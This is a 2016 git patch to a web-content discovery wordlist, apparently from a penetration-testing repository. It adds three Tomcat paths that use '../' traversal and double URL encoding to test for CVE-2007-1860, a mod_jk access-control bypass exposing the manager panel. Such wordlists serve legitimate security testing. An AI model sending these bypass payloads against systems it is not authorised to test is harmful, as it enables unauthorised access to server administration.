From fff5faa976521cf396aceb1eb7a8dbe831d3fda2 Mon Sep 17 00:00:00 2001 From: Tiago Sintra Date: Thu, 28 Jul 2016 14:10:42 +0200 Subject: [PATCH] Support for CVE-2007-1860 mod_jk double encoding Added paths that will check access control bypass using double encoding (CVE-2007-1860) that could allow a remote user to access Tomcat's administration panel. Based on the scenario demonstrated on https://pentesterlab.com/exercises/cve-2007-1860/course --- Discovery/Web_Content/tomcat.txt | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Discovery/Web_Content/tomcat.txt b/Discovery/Web_Content/tomcat.txt index 1648921d..8df5eab9 100644 --- a/Discovery/Web_Content/tomcat.txt +++ b/Discovery/Web_Content/tomcat.txt @@ -21,6 +21,9 @@ examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp examples/servlet/snoop examples/servlets/index.html +examples/../manager/html +examples/%2e%2e/manager/html +examples/%252e%252e/manager/html host-manager host-manager/add host-manager/host-manager.xml